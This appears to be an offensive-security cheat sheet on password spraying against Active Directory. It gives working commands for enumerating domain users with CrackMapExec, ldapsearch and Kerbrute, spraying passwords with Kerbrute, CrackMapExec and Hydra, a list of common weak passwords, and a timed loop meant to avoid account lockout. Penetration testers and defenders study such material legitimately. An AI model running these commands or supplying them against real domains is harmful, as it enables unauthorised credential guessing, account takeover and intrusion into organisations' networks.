> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Password Spraying

> Password spraying against Active Directory: Kerbrute, CrackMapExec, and lockout-safe techniques.

## Overview

Try one password against many users. Avoids account lockout (usually 3-5 attempts). Check lockout policy first.

***

## Check Lockout Policy

```bash theme={"dark"}
crackmapexec smb DC_IP -u user -p password --pass-pol
```

```powershell theme={"dark"}
net accounts /domain
Get-ADDefaultDomainPasswordPolicy
```

***

## Get User List

```bash theme={"dark"}
# Enum via RPC
crackmapexec smb DC_IP -u user -p password --users

# Enum via LDAP
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" -D "user@domain.local" -w 'pass' "(objectClass=user)" sAMAccountName | grep sAMAccountName

# Kerbrute user enum (no creds needed)
kerbrute userenum -d domain.local --dc DC_IP users.txt
```

***

## Kerbrute

```bash theme={"dark"}
kerbrute passwordspray -d domain.local --dc DC_IP users.txt 'Password123!'
```

<Warning>
  `passwordspray` **does** increment `badPwdCount` and can lock out accounts — each attempt is a real AS-REQ that generates Event ID 4771 on failure. Only `kerbrute userenum` avoids lockouts/failed-logon events. Use `--safe` to abort all threads if any account comes back locked out.
</Warning>

***

## CrackMapExec

### SMB

```bash theme={"dark"}
crackmapexec smb DC_IP -u users.txt -p 'Password123!' --continue-on-success
```

### LDAP

```bash theme={"dark"}
crackmapexec ldap DC_IP -u users.txt -p 'Password123!'
```

### Multiple Passwords (Careful — Lockout)

```bash theme={"dark"}
crackmapexec smb DC_IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
```

`--no-bruteforce` = try user1:pass1, user2:pass2 (not all combos).

***

## Spray with Hydra

```bash theme={"dark"}
hydra -L users.txt -p 'Password123!' smb://DC_IP
hydra -L users.txt -p 'Password123!' ldap3://DC_IP
```

***

## Common Passwords to Try

```
Password1
Password123
Password123!
Welcome1
Welcome123
Company2024
Season+Year (Summer2024, Winter2024)
MonthYear (January2024)
```

***

## Spray Script (Rate Limited)

```bash theme={"dark"}
for pass in 'Spring2024!' 'Password123!' 'Welcome1'; do
    echo "[*] Trying: $pass"
    crackmapexec smb DC_IP -u users.txt -p "$pass" --continue-on-success
    echo "[*] Sleeping 30 minutes..."
    sleep 1800
done
```

***

## Quick Reference

| Task         | Command                                                            |
| ------------ | ------------------------------------------------------------------ |
| Check policy | `crackmapexec smb DC -u user -p pass --pass-pol`                   |
| Kerbrute     | `kerbrute passwordspray -d DOM --dc DC users.txt 'Pass'`           |
| CME spray    | `crackmapexec smb DC -u users.txt -p 'Pass' --continue-on-success` |
| User enum    | `kerbrute userenum -d DOM --dc DC users.txt`                       |
